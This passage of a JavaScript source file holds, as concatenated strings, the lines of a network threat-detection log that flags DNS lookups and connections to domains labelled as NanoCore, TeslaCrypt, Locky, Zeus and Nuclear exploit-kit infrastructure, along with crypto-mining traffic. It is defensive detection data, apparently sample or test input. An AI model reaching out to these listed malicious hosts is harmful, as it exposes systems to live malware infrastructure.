    '"2021-01-11 01:34:28.005551" r2d2 2.200.105.226 58266 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:34:28.035937" r2d2 2.200.105.226 60815 173.245.58.202 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:34:28.036102" r2d2 2.200.105.226 60815 173.245.58.202 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:34:37.110032" r2d2 10.43.192.103 56276 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:34:43.383268" r2d2 2.200.107.146 6523 199.19.53.1 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:34:43.381847" r2d2 2.200.110.232 64165 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:34:43.381913" r2d2 2.200.110.232 64106 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:34:43.384562" r2d2 2.200.107.146 6651 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:34:55.239779" r2d2 10.43.192.103 56279 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:35:07.315585" r2d2 10.43.192.103 56281 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:35:13.356274" r2d2 10.43.192.103 56282 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:35:25.440062" r2d2 10.43.192.103 56284 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:35:28.315645" r2d2 2.200.110.232 64088 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:35:28.344026" r2d2 2.200.110.233 63718 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:35:43.530017" r2d2 10.43.192.103 56287 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:35:49.094001" r2d2 2.200.107.168 53 2.200.110.233 64574 UDP DNS (cdn.switchadhub).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:35:49.093992" r2d2 2.200.107.168 53 2.200.110.233 64574 UDP DNS (cdn.switchadhub).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:35:49.108024" r2d2 2.200.107.168 53 2.200.110.232 63853 UDP DNS (delivery.g.switchadhub).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:35:49.108463" r2d2 2.200.107.168 53 2.200.110.233 64235 UDP DNS (delivery.swid.switchadhub).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:35:49.108461" r2d2 2.200.107.168 53 2.200.110.233 64235 UDP DNS (delivery.swid.switchadhub).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:35:49.108025" r2d2 2.200.107.168 53 2.200.110.232 63853 UDP DNS (delivery.g.switchadhub).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:35:55.600154" r2d2 10.43.192.103 56289 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:35:59.610558" r2d2 2.200.107.146 19083 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:35:59.619631" r2d2 2.200.110.232 65462 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:35:59.608908" r2d2 2.200.110.232 64421 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:36:01.629409" r2d2 10.43.192.103 56290 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:35:54.429765" r2d2 10.1.19.42 59229 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:36:13.710183" r2d2 10.43.192.103 56292 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:36:31.844778" r2d2 10.43.192.103 56295 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:36:37.219603" r2d2 2.200.110.233 63746 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:36:37.220919" r2d2 2.200.107.146 36920 193.232.156.17 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:36:37.341357" r2d2 2.200.110.233 64323 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:36:37.342917" r2d2 2.200.107.146 21192 173.201.73.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:36:37.347747" r2d2 2.200.110.233 63706 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:36:38.345991" r2d2 2.200.110.232 64300 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:36:38.382248" r2d2 2.200.110.233 64219 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:36:43.398910" r2d2 2.200.110.232 64606 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:36:43.925673" r2d2 10.43.192.103 56297 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:36:49.966882" r2d2 10.43.192.103 56298 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:36:51.592287" r2d2 178.17.174.14 48822 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; FunWebProducts; GTB7.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; McAfee\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:36:53.340112" r2d2 2.200.107.146 30487 54.147.161.132 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:36:53.336875" r2d2 2.200.110.233 65369 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:36:51.592248" r2d2 178.17.174.14 48822 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; FunWebProducts; GTB7.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; McAfee\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:36:51.592291" r2d2 178.17.174.14 48822 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; FunWebProducts; GTB7.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; McAfee\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:37:02.061198" r2d2 10.43.192.103 56300 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:36:53.332613" r2d2 178.17.174.14 48868 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.3; \\(R1 1.6\\); .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;US; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; BRI/2; BO2IE8_v1;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:37:08.090345" r2d2 10.43.192.103 56303 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:37:06.575306" r2d2 10.1.19.42 59230 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:37:20.130698" r2d2 10.43.192.103 56305 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:37:23.749180" r2d2 10.1.81.47 62569 10.1.20.51 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 01:37:26.163660" r2d2 10.43.192.103 56306 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:37:38.245493" r2d2 10.43.192.103 56308 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:37:43.358542" r2d2 2.200.97.1 58846 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:37:43.381837" r2d2 2.200.110.232 65358 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:37:43.380484" r2d2 2.200.110.232 65314 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:37:43.399991" r2d2 2.200.110.232 63829 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:37:43.401592" r2d2 2.200.107.146 19687 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:37:43.401892" r2d2 2.200.110.232 63506 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:37:43.404236" r2d2 2.200.110.232 65453 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:37:43.538457" r2d2 2.200.107.146 7748 217.115.6.76 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:37:47.040434" r2d2 2.200.110.233 63233 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:37:47.221869" r2d2 2.200.110.233 65170 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:37:47.350529" r2d2 2.200.110.233 64705 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:37:47.352174" r2d2 2.200.107.146 34506 173.201.68.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:37:47.601610" r2d2 2.200.110.233 63536 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:37:47.603151" r2d2 2.200.107.146 57156 194.190.124.17 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:37:48.400478" r2d2 2.200.110.233 49227 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:37:56.361817" r2d2 10.43.192.103 56311 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:38:06.680813" r2d2 2.200.110.233 64576 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:38:08.433262" r2d2 10.43.192.103 56313 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:38:14.483527" r2d2 10.43.192.103 56314 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:38:25.687452" r2d2 10.3.160.42 13677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:38:25.788107" r2d2 10.3.160.42 13677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:38:25.885991" r2d2 10.3.160.42 13677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:38:26.386046" r2d2 10.3.160.42 13677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:38:26.567768" r2d2 10.43.192.103 56316 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:38:27.885768" r2d2 10.3.160.42 13677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:38:32.016711" r2d2 2.200.105.226 58305 208.67.222.123 53 UDP DNS (pool-de).supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:38:32.749046" r2d2 2.200.97.3 63063 185.21.170.49 53 UDP DNS (server.miwina).ga "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:38:33.514441" r2d2 2.200.97.4 53211 185.21.168.49 53 UDP DNS (server.miwina).ga "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:38:44.688229" r2d2 10.43.192.103 56319 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:38:56.767440" r2d2 10.43.192.103 56321 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:38:57.794391" r2d2 2.200.107.146 52344 45.175.22.88 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:38:57.792901" r2d2 2.200.110.233 65245 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:38:58.400481" r2d2 2.200.110.232 65050 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:38:58.428458" r2d2 2.200.110.233 64650 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:38:59.607488" r2d2 2.200.110.232 65381 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:38:59.609149" r2d2 2.200.107.146 13508 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:39:02.803224" r2d2 10.43.192.103 56322 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:39:14.884563" r2d2 10.43.192.103 56324 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:39:25.658710" r2d2 2.200.105.226 59550 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:39:25.658611" r2d2 2.200.105.226 59550 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:39:33.003571" r2d2 10.43.192.103 56327 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:39:34.714683" r2d2 10.1.19.42 59232 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:39:39.043516" r2d2 10.43.192.103 56330 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:39:51.140499" r2d2 10.43.192.103 56332 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:39:59.605413" r2d2 2.200.110.232 64084 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:39:59.605547" r2d2 2.200.110.232 64599 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:39:59.607291" r2d2 2.200.107.146 1053 173.201.76.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:39:59.611932" r2d2 2.200.110.232 49418 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:39:59.609995" r2d2 2.200.110.232 49260 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:39:59.612103" r2d2 2.200.107.146 18933 192.35.51.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:39:59.612575" r2d2 2.200.110.232 64831 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:39:59.617670" r2d2 2.200.110.232 63468 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:39:59.623086" r2d2 2.200.110.232 65122 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:39:59.618897" r2d2 2.200.110.232 63953 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:39:59.628472" r2d2 2.200.107.146 6291 192.31.80.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:39:59.623450" r2d2 2.200.110.232 63395 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:39:59.624965" r2d2 2.200.110.232 64074 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:39:59.625214" r2d2 2.200.107.146 28039 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:39:59.626279" r2d2 2.200.110.232 65186 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:39:59.626283" r2d2 2.200.110.232 64597 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:40:07.025384" r2d2 2.200.110.233 49187 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:40:07.036312" r2d2 2.200.110.233 63775 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:40:07.113644" r2d2 2.200.110.233 65489 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:40:08.435210" r2d2 2.200.110.233 63510 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:40:09.251058" r2d2 10.43.192.103 56335 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:40:09.787664" r2d2 2.200.107.168 53 2.200.106.65 49485 UDP DNS (lennonforjustice).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:40:21.326050" r2d2 10.43.192.103 56337 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:40:25.875886" r2d2 10.3.160.42 13678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:40:25.977247" r2d2 10.3.160.42 13678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:40:26.075769" r2d2 10.3.160.42 13678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:40:26.275871" r2d2 10.3.160.42 13678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:40:27.355931" r2d2 10.43.192.103 56338 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:40:28.075584" r2d2 10.3.160.42 13678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:40:43.385737" r2d2 2.200.110.232 64770 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:40:43.386865" r2d2 2.200.107.146 56555 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:40:45.481182" r2d2 10.43.192.103 56343 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:40:57.568342" r2d2 10.43.192.103 56345 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:40:59.623144" r2d2 2.200.110.232 65193 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:41:03.603744" r2d2 10.43.192.103 56346 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:41:15.676994" r2d2 10.43.192.103 56348 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:41:17.225742" r2d2 2.200.110.233 63736 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:41:18.434632" r2d2 2.200.110.232 64962 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:41:18.462091" r2d2 2.200.110.233 63402 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:41:21.703214" r2d2 10.43.192.103 56351 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:41:18.632948" r2d2 182.117.70.178 43211 2.200.110.209 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:41:24.699000" r2d2 2.200.109.50 60407 8.8.8.8 53 UDP DNS (update).drp.su "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:41:18.632904" r2d2 182.117.70.178 43211 2.200.110.209 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:41:26.829380" r2d2 10.1.19.42 59240 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:41:18.632951" r2d2 182.117.70.178 43211 2.200.110.209 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:41:33.771350" r2d2 10.43.192.103 56353 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:41:39.808397" r2d2 10.43.192.103 56354 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:41:51.873323" r2d2 10.43.192.103 56356 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:41:59.392745" r2d2 2.200.110.232 49415 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:41:59.394555" r2d2 2.200.107.146 17893 108.162.192.63 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:41:59.609401" r2d2 2.200.110.232 64696 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:41:59.796635" r2d2 2.200.110.232 64818 2.200.107.168 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:42:06.726647" r2d2 2.200.107.146 28683 46.101.179.64 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:42:06.725584" r2d2 2.200.110.232 49177 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:42:07.210405" r2d2 2.200.110.232 64953 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:42:07.212046" r2d2 2.200.107.146 16282 205.251.196.50 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:42:09.986077" r2d2 10.43.192.103 56359 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:42:22.075435" r2d2 10.43.192.103 56362 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:42:24.857497" r2d2 2.200.110.232 49319 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:42:24.858922" r2d2 2.200.107.146 53999 178.62.208.8 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:42:26.928616" r2d2 2.200.110.233 65276 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:42:27.047661" r2d2 2.200.110.232 49332 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:42:27.050430" r2d2 2.200.107.146 6667 37.209.194.12 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:42:27.068204" r2d2 2.200.110.233 65121 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:42:27.075961" r2d2 2.200.110.233 65493 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:42:28.466737" r2d2 2.200.110.232 63676 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:42:28.468255" r2d2 2.200.107.146 23616 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:42:28.494046" r2d2 2.200.110.233 64685 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:42:43.488196" r2d2 2.200.97.1 52716 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:42:46.194955" r2d2 10.43.192.103 56386 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:42:58.269252" r2d2 10.43.192.103 56393 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:43:04.307523" r2d2 10.43.192.103 56401 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:43:14.963377" r2d2 2.200.104.32 54556 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:43:14.797904" r2d2 192.168.30.231 54556 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:43:16.377569" r2d2 10.43.192.103 56404 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
